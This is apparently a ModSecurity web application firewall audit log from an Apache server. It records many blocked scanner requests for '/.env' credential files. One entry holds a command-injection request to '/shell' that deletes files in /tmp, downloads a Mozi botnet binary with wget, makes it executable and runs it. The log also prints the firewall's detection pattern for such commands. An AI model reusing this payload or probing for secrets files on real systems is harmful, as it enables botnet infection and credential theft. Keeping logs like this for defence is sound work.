[22/Apr/2025:08:20:48 +0700] aAbu8M0DNRaK3AYHswIl4wAAABU 103.236.140.4 33142 103.236.140.4 8181
--3be0f011-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; PIC-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--3be0f011-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3be0f011-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745284848519930 788 (- - -)
Stopwatch2: 1745284848519930 788; combined=370, p1=333, p2=0, p3=0, p4=0, p5=36, sr=128, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3be0f011-Z--
--e6a1b572-A--
[22/Apr/2025:09:12:16 +0700] aAb7AK3OiIHZ_gUDzTsatgAAAMw 103.236.140.4 37220 103.236.140.4 8181
--e6a1b572-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 64.227.32.66
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 64.227.32.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--e6a1b572-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6a1b572-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745287936593108 758 (- - -)
Stopwatch2: 1745287936593108 758; combined=283, p1=249, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6a1b572-Z--
--2b3dc55d-A--
[22/Apr/2025:10:33:02 +0700] aAcN7q3OiIHZ_gUDzTtsOAAAAMQ 103.236.140.4 51048 103.236.140.4 8181
--2b3dc55d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.127
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.127
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Charset: utf-8
--2b3dc55d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b3dc55d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745292782247103 835 (- - -)
Stopwatch2: 1745292782247103 835; combined=412, p1=377, p2=0, p3=0, p4=0, p5=34, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b3dc55d-Z--
--fcce8b15-A--
[22/Apr/2025:10:34:40 +0700] aAcOUF9gRrTzIZGIAfk3fQAAAJU 103.236.140.4 33340 103.236.140.4 8181
--fcce8b15-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.127
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.127
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1
Accept-Charset: utf-8
--fcce8b15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcce8b15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745292880269904 717 (- - -)
Stopwatch2: 1745292880269904 717; combined=318, p1=289, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcce8b15-Z--
--27836a78-A--
[22/Apr/2025:11:40:56 +0700] aAcd2F9gRrTzIZGIAfmMXAAAAIU 103.236.140.4 56592 103.236.140.4 8181
--27836a78-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 128.199.20.147
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 128.199.20.147
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--27836a78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--27836a78-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745296856674774 870 (- - -)
Stopwatch2: 1745296856674774 870; combined=383, p1=342, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--27836a78-Z--
--cddab21a-A--
[22/Apr/2025:13:18:01 +0700] aAc0mc0DNRaK3AYHswKlOQAAAAs 103.236.140.4 43794 103.236.140.4 8181
--cddab21a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)
Accept-Charset: utf-8
--cddab21a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cddab21a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745302681660552 737 (- - -)
Stopwatch2: 1745302681660552 737; combined=282, p1=249, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cddab21a-Z--
--8e5bb77f-A--
[22/Apr/2025:14:27:06 +0700] aAdEyq3OiIHZ_gUDzTub3AAAAMs 103.236.140.4 56560 103.236.140.4 8181
--8e5bb77f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 95.214.54.165
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 95.214.54.165
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--8e5bb77f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e5bb77f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745306826060135 1100 (- - -)
Stopwatch2: 1745306826060135 1100; combined=551, p1=505, p2=0, p3=0, p4=0, p5=45, sr=67, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e5bb77f-Z--
--a4125001-A--
[22/Apr/2025:14:46:22 +0700] aAdJTi3NG0xEq1F63-KQHQAAAE0 103.236.140.4 47392 103.236.140.4 8181
--a4125001-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 139.59.132.8
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 139.59.132.8
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--a4125001-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a4125001-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745307982664363 958 (- - -)
Stopwatch2: 1745307982664363 958; combined=324, p1=291, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a4125001-Z--
--25d0b070-A--
[22/Apr/2025:15:14:10 +0700] aAdP0V9gRrTzIZGIAfm5hQAAAIU 103.236.140.4 45940 103.236.140.4 8181
--25d0b070-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.198.69.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.198.69.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--25d0b070-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--25d0b070-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745309649999656 779 (- - -)
Stopwatch2: 1745309649999656 779; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--25d0b070-Z--
--daa19906-A--
[22/Apr/2025:16:00:33 +0700] aAdasa3OiIHZ_gUDzTsfvgAAANU 103.236.140.4 60834 103.236.140.4 8181
--daa19906-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 159.223.132.86
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 159.223.132.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--daa19906-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--daa19906-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745312433097234 611 (- - -)
Stopwatch2: 1745312433097234 611; combined=261, p1=231, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--daa19906-Z--
--2a641164-A--
[22/Apr/2025:16:57:27 +0700] aAdoBy3NG0xEq1F63-IpuQAAAEA 103.236.140.4 59286 103.236.140.4 8181
--2a641164-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.144.212.120
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.144.212.120
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--2a641164-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a641164-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745315847613969 751 (- - -)
Stopwatch2: 1745315847613969 751; combined=271, p1=239, p2=0, p3=0, p4=0, p5=31, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a641164-Z--
--8a43447e-A--
[22/Apr/2025:17:25:34 +0700] aAdunl9gRrTzIZGIAfkvkQAAAJU 103.236.140.4 52812 103.236.140.4 8181
--8a43447e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Accept-Charset: utf-8
--8a43447e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a43447e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745317534784617 13285 (- - -)
Stopwatch2: 1745317534784617 13285; combined=25231, p1=334, p2=0, p3=0, p4=0, p5=12464, sr=121, sw=0, l=0, gc=12433
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a43447e-Z--
--93acfc24-A--
[22/Apr/2025:17:26:48 +0700] aAdu6M0DNRaK3AYHswIbdQAAAAE 103.236.140.4 56594 103.236.140.4 8181
--93acfc24-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Accept-Charset: utf-8
--93acfc24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--93acfc24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745317608414862 857 (- - -)
Stopwatch2: 1745317608414862 857; combined=361, p1=324, p2=0, p3=0, p4=0, p5=36, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93acfc24-Z--
--21e1dd47-A--
[22/Apr/2025:17:31:53 +0700] aAdwGa3OiIHZ_gUDzTt3fwAAANQ 103.236.140.4 44096 103.236.140.4 8181
--21e1dd47-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8
Accept-Charset: utf-8
--21e1dd47-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--21e1dd47-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745317913817775 847 (- - -)
Stopwatch2: 1745317913817775 847; combined=367, p1=325, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--21e1dd47-Z--
--87568250-A--
[22/Apr/2025:17:50:26 +0700] aAd0cq3OiIHZ_gUDzTuEpwAAAM0 103.236.140.4 44050 103.236.140.4 8181
--87568250-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 64.227.70.2
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 64.227.70.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--87568250-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--87568250-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745319026349385 832 (- - -)
Stopwatch2: 1745319026349385 832; combined=295, p1=260, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--87568250-Z--
--ca65e84a-A--
[22/Apr/2025:18:55:31 +0700] aAeDs80DNRaK3AYHswJNPAAAAAQ 103.236.140.4 47210 103.236.140.4 8181
--ca65e84a-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 139.59.132.8
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 139.59.132.8
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--ca65e84a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca65e84a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745322931892185 778 (- - -)
Stopwatch2: 1745322931892185 778; combined=341, p1=303, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca65e84a-Z--
--8073f329-A--
[22/Apr/2025:19:43:44 +0700] aAePAM0DNRaK3AYHswJSFQAAABY 103.236.140.4 33684 103.236.140.4 8181
--8073f329-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 157.230.19.140
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 157.230.19.140
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--8073f329-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8073f329-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745325824103117 796 (- - -)
Stopwatch2: 1745325824103117 796; combined=325, p1=282, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8073f329-Z--
--87527603-A--
[22/Apr/2025:19:45:07 +0700] aAePUy3NG0xEq1F63-JxSAAAAEo 103.236.140.4 34132 103.236.140.4 8181
--87527603-B--
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 77.239.222.139
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 77.239.222.139
X-Forwarded-Proto: http
Connection: close
User-Agent: Hello, world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
--87527603-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--87527603-E--
--87527603-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745325907055924 2130 (- - -)
Stopwatch2: 1745325907055924 2130; combined=678, p1=427, p2=220, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--87527603-Z--
--27cf7813-A--
[22/Apr/2025:19:45:24 +0700] aAePZM0DNRaK3AYHswJSNQAAABI 103.236.140.4 34218 103.236.140.4 8181
--27cf7813-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5
Accept-Charset: utf-8
--27cf7813-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--27cf7813-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745325924249188 816 (- - -)
Stopwatch2: 1745325924249188 816; combined=380, p1=344, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--27cf7813-Z--
--3b90ea7f-A--
[22/Apr/2025:20:48:44 +0700] aAeePF9gRrTzIZGIAflmjQAAAIs 103.236.140.4 60522 103.236.140.4 8181
--3b90ea7f-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 165.227.84.14
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 165.227.84.14
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--3b90ea7f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
